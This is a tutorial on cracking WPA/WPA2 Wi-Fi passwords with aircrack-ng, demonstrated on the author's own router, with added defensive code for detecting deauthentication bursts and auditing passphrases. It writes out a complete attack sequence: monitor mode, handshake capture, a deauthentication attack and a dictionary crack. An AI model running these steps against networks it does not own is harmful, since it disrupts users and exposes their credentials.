Hacking Wi-Fi with Aircrack-ng


This is an article about how to crack WPA/WPA2 passwords with Aircrack-ng.

Basic environment

System: Kali Linux 2016.1
Tool: USB wireless adapter

Set mode to monitor

Boot Kali Linux and connect the USB wireless adapter.
Type in the terminal:

root@kali:~/Desktop# ifconfig wlan0 down
root@kali:~/Desktop# iwconfig wlan0 mode monitor
root@kali:~/Desktop# iwconfig
wlan0 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
 
lo no wireless extensions.
 
eth0 no wireless extensions.

The interface mode has now changed from managed to monitor.

Collecting wireless signals nearby

root@kali:~/Desktop# airodump-ng wlan0
 CH  5 ][ Elapsed: 30 s ][ 2016-09-18 03:05                                         
                                                                                                                                                                                  
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                  
 74:1F:4A:0C:77:71  -54       16        0    0   1  54e. OPN              ChinaUnicom                                                                                             
 74:1F:4A:0C:77:70  -55       16        0    0   1  54e. OPN              nuaa.portal                                                                                             
 44:97:5A:D7:8F:8E  -64       11        0    0  12  54e  WPA2 CCMP   PSK  20604                                                                                                   
 74:1F:4A:0C:2E:B1  -75       12        0    0   6  54e. OPN              ChinaUnicom                                                                                             
 74:1F:4A:0C:2E:B0  -76       12        0    0   6  54e. OPN              nuaa.portal                                                                                             
 44:97:5A:68:6E:BE  -77       14        0    0  13  54e  OPN              FAST_6EBE                                                                                               
 44:97:5A:8A:C6:7A  -78       14        0    0   3  54e  OPN              FAST_C67A                                                                                               
 3C:A3:48:47:83:DE  -80       13        0    0   6  54e. WPA2 CCMP   PSK  vivo Y913                                                                                               
 70:BA:EF:E8:DD:D1  -82        7        0    0   6  54e. OPN              ChinaUnicom                                                                                             
 70:BA:EF:E8:DD:D0  -83        5        0    0   6  54e. OPN              nuaa.portal                                                                                             
                                                                                                                                                                                  
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                        
                                                                                                                                                                                  
 44:97:5A:D7:8F:8E  A0:99:9B:1A:0B:FF  -32    0 -24e     0        1

Wait for 10 s, then terminate with Ctrl+C.
Now I’ve got all available wireless signals.

Analyze data

Locate the target by SSID; here I’m going to use my own router as the example.
My ssid: 20604.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 44:97:5A:D7:8F:8E  -64       11        0    0  12  54e  WPA2 CCMP   PSK  20604

Information of 20604:
BSSID: 44:97:5A:D7:8F:8E
CHANNEL: 11
CIPHER: WPA2
ESSID: 20604

Launch attack

root@kali:~/Desktop# airodump-ng -c 11 --bssid 44:97:5A:D7:8F:8E -w /root/Desktop/ wlan0

Airodump-ng:
-c          channel
--bssid     bssid
-w          directory to save packet data
wlan0       network interface

I prefer to use Terminator, sniffing in the left pane and executing in the right:

root@kali:~# aireplay-ng -0 1 -a 44:97:5A:D7:8F:8E wlan0

Wait for handshake.

CH 12 ][ Elapsed: 12 s ][ 2016-09-18 03:20 ][ WPA handshake: 44:97:5A:D7:8F:8E                                         
                                                                                                                                                                                 
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                 
44:97:5A:D7:8F:8E  -66 100      149       68    3  12  54e  WPA2 CCMP   PSK  20604                                                                                               
                                                                                                                                                                                 
BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                        
                                                                                                                                                                                 
44:97:5A:D7:8F:8E  A0:99:9B:1A:0B:FF  -32    1e-24e   994       73                                                                                                                
44:97:5A:D7:8F:8E  9C:FC:01:AB:1F:28  -48    1e-24    912      149                                                                                                                
44:97:5A:D7:8F:8E  D4:F4:6F:64:EF:85  -72    0 -24      0        6
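
Seen from the defending side, the deauthentication step above appears on the air as 802.11 management frames of subtype 12 carrying the target BSSID. The following is an added example, not part of the original article: it parses raw 802.11 frames (radiotap header already stripped) and reports BSSIDs hit by a burst of deauthentication frames. The sample frames, the 02:00:... addresses, the window and the threshold are constructed assumptions.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame: bytes):
    """Return (dst, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26:  # 24-byte management header + 2-byte reason code
        return None
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x3, (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    if version != 0 or ftype != 0 or subtype != 12:  # management frame, subtype 12
        return None
    reason = int.from_bytes(frame[24:26], "little")
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def deauth_bursts(frames, window=1.0, threshold=5):
    """frames: (timestamp_seconds, raw_frame) pairs. Returns {bssid: peak count}
    for every BSSID with at least `threshold` deauths inside `window` seconds."""
    seen = defaultdict(list)
    for ts, raw in frames:
        hit = parse_deauth(raw)
        if hit:
            seen[hit[2]].append(ts)
    alerts = {}
    for bssid, stamps in seen.items():
        stamps.sort()
        peak = start = 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts

def make_frame(subtype, dst, src, bssid, body=b"\x07\x00"):
    """Build a constructed management frame for the sample below."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return bytes([subtype << 4, 0, 0, 0]) + raw(dst) + raw(src) + raw(bssid) + b"\x00\x00" + body

AP, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:02"  # constructed addresses
SAMPLE = [(10.0 + i * 0.01, make_frame(12, BROADCAST, AP, AP)) for i in range(8)]
SAMPLE.append((3.0, make_frame(8, BROADCAST, AP, AP, b"\x00" * 12)))  # beacon-type frame, ignored
SAMPLE.append((50.0, make_frame(12, AP, OTHER, OTHER)))  # one isolated deauth, below threshold

if __name__ == "__main__":
    print(deauth_bursts(SAMPLE))
```

Protected Management Frames (802.11w) let the access point and its clients discard unauthenticated deauthentication frames, which removes the forced reconnect this detector looks for.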

Brute forcing

There are now 4 files on the Desktop:

  • 01.csv
  • 01.kismet.csv
  • 01.kismet.netxml
  • 01.cap

I only need 01.cap.

root@kali:~# aircrack-ng -a2 -b 44:97:5A:D7:8F:8E -w /root/Desktop/test.txt /root/Desktop/*.cap

The dictionary contains only one entry, 88888888 (my test password).

                           Aircrack-ng 1.2 rc4
[00:00:00] 1/0 keys tested (165.67 k/s) 
Time left: 0 seconds                                   inf%
                     KEY FOUND! [ 88888888 ]
Master Key     : 54 69 F8 8E A5 E2 FB 10 E8 E6 A5 09 C9 82 43 DA 
                 B0 05 7E 66 2F 59 20 BF 51 C8 27 BC 18 90 F4 18 
Transient Key  : 90 1E 4F 72 FD 2D D2 2A FE FE 82 59 F8 01 EB 7B 
                 C9 16 1B D1 08 D5 80 F6 04 28 93 45 C0 D3 83 5E 
                 01 DB 1F C6 ED 31 31 A9 A3 FA 1B FB 19 F3 B4 EB 
                 DD 90 59 D5 CD 23 4E AB 9C 4F 09 DF CF E8 BC BB 
EAPOL HMAC     : 10 4E 71 12 8B 77 DC D5 64 C7 18 2D 4F DA 98 77

About dictionaries

The cracking time depends on the dictionary used.
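
The passphrase is the only secret in WPA/WPA2-PSK: the key printed as "Master Key" above is derived from the passphrase and the SSID alone, so the choice of passphrase decides how much a captured handshake is worth. The following is an added example, not part of the original article, for auditing your own passphrase; the wordlist contents and the guess rate are constructed assumptions, not measurements.

```python
import hashlib
import string

ASSUMED_RATE = 10_000  # guesses per second; an illustrative assumption, not a benchmark

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def keyspace(passphrase: str) -> int:
    """Candidates an exhaustive search over the same character classes and length covers."""
    alphabet = 0
    if any(c in string.digits for c in passphrase):
        alphabet += 10
    if any(c in string.ascii_lowercase for c in passphrase):
        alphabet += 26
    if any(c in string.ascii_uppercase for c in passphrase):
        alphabet += 26
    if any(c not in string.ascii_letters + string.digits for c in passphrase):
        alphabet += len(string.punctuation)  # 32 printable symbols
    return alphabet ** len(passphrase)

def audit(passphrase: str, wordlist: set, rate: float = ASSUMED_RATE):
    """Return (findings, hours to exhaust the passphrase's keyspace at `rate`)."""
    findings = []
    if not 8 <= len(passphrase) <= 63:
        findings.append("length outside the 8..63 characters WPA2-PSK allows")
    if passphrase in wordlist:
        findings.append("present in wordlist")
    if len(set(passphrase)) == 1:
        findings.append("single repeated character")
    if passphrase.isdigit():
        findings.append("digits only")
    return findings, keyspace(passphrase) / rate / 3600

if __name__ == "__main__":
    wordlist = {"88888888", "12345678", "password"}  # constructed sample entries
    for candidate in ("88888888", "abc12345"):
        findings, hours = audit(candidate, wordlist)
        print(candidate, findings, f"{hours:.1f} h at {ASSUMED_RATE} guesses/s")
    # The SSID is the salt, so the same passphrase gives a different key on another network.
    print(derive_pmk("88888888", "20604") != derive_pmk("88888888", "other-ssid"))
```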
